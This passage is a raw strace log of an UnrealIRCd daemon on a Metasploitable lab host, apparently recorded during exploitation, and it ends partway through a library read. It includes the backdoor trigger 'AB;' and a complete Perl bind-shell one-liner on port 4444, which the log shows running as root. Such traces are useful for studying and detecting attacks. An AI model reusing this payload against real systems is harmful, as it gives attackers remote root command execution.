4519  07:32:59.217575 select(1024, [2 3 4 7 9], [], NULL, {0, 960000}) = 1 (in [4], left {0, 830000})

4519  07:32:59.348052 clock_gettime(CLOCK_MONOTONIC, {2389, 165061231}) = 0

4519  07:32:59.348052 recv(4, "PRIVMSG  #testit ABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 44

4519  07:32:59.348053 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.348053 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.348053 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.348053 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.348053 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.348054 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.348065 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.348083 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.348096 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.348110 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.348123 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.348137 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.348150 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.348164 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.348177 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.348190 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.348204 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.348217 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.348267 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.348282 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.348310 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.348324 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.348341 gettimeofday({1495625579, 348345}, NULL) = 0

4519  07:32:59.348353 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {0, 970000})

4519  07:32:59.379601 clock_gettime(CLOCK_MONOTONIC, {2389, 196621725}) = 0

4519  07:32:59.379621 time(NULL)        = 1495625579

4519  07:32:59.379632 time(NULL)        = 1495625579

4519  07:32:59.379643 gettimeofday({1495625579, 379647}, NULL) = 0

4519  07:32:59.379655 select(1024, [2], [], NULL, {0, 0}) = 1 (in [2], left {0, 0})

4519  07:32:59.379734 clock_gettime(CLOCK_MONOTONIC, {2389, 196748057}) = 0

4519  07:32:59.379746 gettimeofday({1495625579, 379767}, NULL) = 0

4519  07:32:59.379774 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {1, 0})

4519  07:32:59.379812 clock_gettime(CLOCK_MONOTONIC, {2389, 196825053}) = 0

4519  07:32:59.379823 accept(2, 0, NULL) = 5

4519  07:32:59.379844 getpeername(5, {sa_family=AF_INET, sin_port=htons(44199), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:32:59.379877 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:32:59.379891 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:32:59.379904 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:32:59.379917 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:32:59.379928 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:32:59.379940 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:32:59.379952 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:32:59.379967 clock_gettime(CLOCK_MONOTONIC, {2389, 196981112}) = 0

4519  07:32:59.380025 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:32:59.380041 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:32:59.380060 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:32:59.380069 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:32:59.380080 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:32:59.380096 send(6, ",\367\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:32:59.380273 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:32:59.380336 gettimeofday({1495625579, 380340}, NULL) = 0

4519  07:32:59.380347 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})

4519  07:32:59.386663 clock_gettime(CLOCK_MONOTONIC, {2389, 203682336}) = 0

4519  07:32:59.386682 recvfrom(6, ",\367\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\1#\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:32:59.386732 close(6)          = 0

4519  07:32:59.386749 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:32:59.386764 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:32:59.386822 time(NULL)        = 1495625579

4519  07:32:59.386835 time(NULL)        = 1495625579

4519  07:32:59.386846 gettimeofday({1495625579, 386850}, NULL) = 0

4519  07:32:59.386858 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:32:59.386886 clock_gettime(CLOCK_MONOTONIC, {2389, 203899387}) = 0

4519  07:32:59.386897 gettimeofday({1495625579, 386901}, NULL) = 0

4519  07:32:59.386907 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [4], left {0, 390000})

4519  07:32:59.988887 clock_gettime(CLOCK_MONOTONIC, {2389, 805912706}) = 0

4519  07:32:59.988920 recv(4, "PRIVMSG  #testit ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 70

4519  07:32:59.988946 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.988964 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.988979 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.988993 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.989007 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.989021 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.989034 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.989048 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.989062 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.989075 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.989089 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.989102 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.989116 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.989129 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.989143 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.989156 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.989170 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.989183 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.989197 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.989211 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.989224 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.989244 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:59.989263 gettimeofday({1495625579, 989267}, NULL) = 0

4519  07:32:59.989275 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:32:59.989326 clock_gettime(CLOCK_MONOTONIC, {2389, 806339896}) = 0

4519  07:32:59.989339 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:32:59.989367 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:32:59.989388 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:32:59.989400 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:32:59.989415 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 10434

10434 07:32:59.989485 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

10434 07:32:59.989499 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

10434 07:32:59.989510 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10434 07:32:59.989523 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

10434 07:32:59.989629 brk(0)            = 0x80f9000

10434 07:32:59.989651 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10434 07:32:59.989668 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f9c000

10434 07:32:59.989684 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10434 07:32:59.989702 open("/etc/ld.so.cache", O_RDONLY) = 1

10434 07:32:59.989715 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10434 07:32:59.989733 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f94000

10434 07:32:59.989743 close(1)          = 0

10434 07:32:59.989754 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10434 07:32:59.989769 open("/lib/libncurses.so.5", O_RDONLY) = 1

10434 07:32:59.989782 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

10434 07:32:59.989886 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

10434 07:32:59.989904 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f64000

10434 07:32:59.989916 mmap2(0xb7f91000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f91000

10434 07:32:59.989933 close(1)          = 0

10434 07:32:59.989945 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10434 07:32:59.989959 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10434 07:32:59.989973 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10434 07:32:59.990067 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10434 07:32:59.990085 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f60000

10434 07:32:59.990096 mmap2(0xb7f62000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f62000

10434 07:32:59.990112 close(1)          = 0

10434 07:32:59.990123 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10434 07:32:59.990136 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10434 07:32:59.990150 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10434 07:32:59.990239 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10434 07:32:59.990256 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f5f000

10434 07:32:59.990270 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e10000

10434 07:32:59.990281 mmap2(0xb7f59000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f59000

10434 07:32:59.990291 mmap2(0xb7f5c000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f5c000

10434 07:32:59.990296 close(1)          = 0

10434 07:32:59.990319 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e0f000

10434 07:32:59.990332 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e0f6b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10434 07:32:59.990402 mprotect(0xb7f59000, 4096, PROT_READ) = 0

10434 07:32:59.990440 munmap(0xb7f94000, 29913) = 0

10434 07:32:59.990467 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10434 07:32:59.990481 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

10434 07:32:59.990501 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfe227e0) = -1 ENOTTY (Inappropriate ioctl for device)

10434 07:32:59.990535 brk(0)            = 0x80f9000

10434 07:32:59.990545 brk(0x80fa000)    = 0x80fa000

10434 07:32:59.990557 brk(0x80fb000)    = 0x80fb000

10434 07:32:59.990573 getuid32()        = 0

10434 07:32:59.990583 getgid32()        = 0

10434 07:32:59.990592 geteuid32()       = 0

10434 07:32:59.990601 getegid32()       = 0

10434 07:32:59.990615 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10434 07:32:59.990628 time(NULL)        = 1495625579

10434 07:32:59.990641 brk(0x80fc000)    = 0x80fc000

10434 07:32:59.990655 brk(0x80fd000)    = 0x80fd000

10434 07:32:59.990675 open("/proc/meminfo", O_RDONLY) = 1

10434 07:32:59.990706 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

10434 07:32:59.990724 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f9b000

10434 07:32:59.990736 read(1, "MemTotal:      1035240 kB\nMemFree:        415756 kB\nBuffers:         77416 kB\nCached:         382700 kB\nSwapCached:          0 kB\nActive:         256416 kB\nInactive:       332636 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        415516 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4640 kB\nWriteback:           0 kB\nAnonPages:      128988 kB\nMapped:          52008 kB\nSlab:            19196 kB\nSReclaimable:    10632 kB\nSUnreclaim:       8564 kB\nPageTables:       1976 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

10434 07:32:59.990821 close(1)          = 0

10434 07:32:59.990832 munmap(0xb7f9b000, 4096) = 0

10434 07:32:59.990845 brk(0x80fe000)    = 0x80fe000

10434 07:32:59.990871 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10434 07:32:59.990885 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10434 07:32:59.990897 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10434 07:32:59.990909 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10434 07:32:59.990920 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

10434 07:32:59.990932 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

10434 07:32:59.990945 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10434 07:32:59.990957 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10434 07:32:59.990970 uname({sys="Linux", node="metasploitable", ...}) = 0

10434 07:32:59.991018 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

10434 07:32:59.991036 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10434 07:32:59.991055 brk(0x8100000)    = 0x8100000

10434 07:32:59.991066 getcwd("/etc/unreal", 4096) = 12

10434 07:32:59.991080 getpid()          = 10434

10434 07:32:59.991096 getppid()         = 4519

10434 07:32:59.991112 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10434 07:32:59.991132 stat64("/sbin/sh", 0xbfe227b8) = -1 ENOENT (No such file or directory)

10434 07:32:59.991145 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10434 07:32:59.991162 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10434 07:32:59.991186 socket(PF_FILE, SOCK_STREAM, 0) = 1

10434 07:32:59.991199 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10434 07:32:59.991221 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10434 07:32:59.991246 close(1)          = 0

10434 07:32:59.991258 socket(PF_FILE, SOCK_STREAM, 0) = 1

10434 07:32:59.991269 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10434 07:32:59.991279 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10434 07:32:59.991297 close(1)          = 0

10434 07:32:59.991310 open("/etc/nsswitch.conf", O_RDONLY) = 1

10434 07:32:59.991324 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

10434 07:32:59.991341 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f9b000

10434 07:32:59.991356 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

10434 07:32:59.991405 read(1, "", 4096) = 0

10434 07:32:59.991415 close(1)          = 0

10434 07:32:59.991424 munmap(0xb7f9b000, 4096) = 0

10434 07:32:59.991440 open("/etc/ld.so.cache", O_RDONLY) = 1

10434 07:32:59.991452 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10434 07:32:59.991469 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f94000

10434 07:32:59.991479 close(1)          = 0

10434 07:32:59.991489 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10434 07:32:59.991504 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

10434 07:32:59.991518 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 